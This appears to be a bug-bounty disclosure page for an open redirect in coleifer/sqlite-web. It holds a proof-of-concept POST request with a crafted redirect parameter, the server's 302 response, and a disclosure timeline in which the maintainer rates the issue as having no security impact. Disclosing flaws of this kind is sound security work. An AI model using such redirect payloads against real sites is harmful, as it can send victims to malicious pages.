Open Redirection in coleifer/sqlite-web
Valid
Reported on
Mar 26th 2022
Description
Open redirect security flaw an attacker to redirect the victims of the application into malicious sites
Proof of Concept
Request
POST /create-table/ HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Origin: http://127.0.0.1:8080
Connection: close
Referer: http://127.0.0.1:8080/
Cookie: session=
Upgrade-Insecure-Requests: 1
redirect=http://google.com&table_name=
Response
HTTP/1.0 302 FOUND
Content-Type: text/html; charset=utf-8
Content-Length: 240
Location: http://google.com
Server: Werkzeug/2.0.2 Python/3.9.9
Date: Sat, 26 Mar 2022 11:45:25 GMT
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>Redirecting...</title>
<h1>Redirecting...</h1>
<p>You should be redirected automatically to target URL: <a href="http://google.com">http://google.com</a>. If not click the link.
Impact
Redirect to unsafe pages
Occurrences
We are processing your report and will contact the
coleifer/sqlite-web
team within 24 hours.
a year ago
We created a
GitHub Issue
asking the maintainers to create a
SECURITY.md
a year ago
We have contacted a member of the
coleifer/sqlite-web
team and are waiting to hear back
a year ago
We have sent a
follow up to the
coleifer/sqlite-web
team.
We will try again in 7 days.
a year ago
Jamie Slome modified the report
a year ago
The maintainer has indicated that this does not have any security implications and so the severity has been assigned None.
I will approve and confirm the fix in any case, as this report was technically addressed with a patch.
The fix bounty has been dropped
This vulnerability will not receive a CVE
sqlite_web.py#L222
has been validated
to join this conversation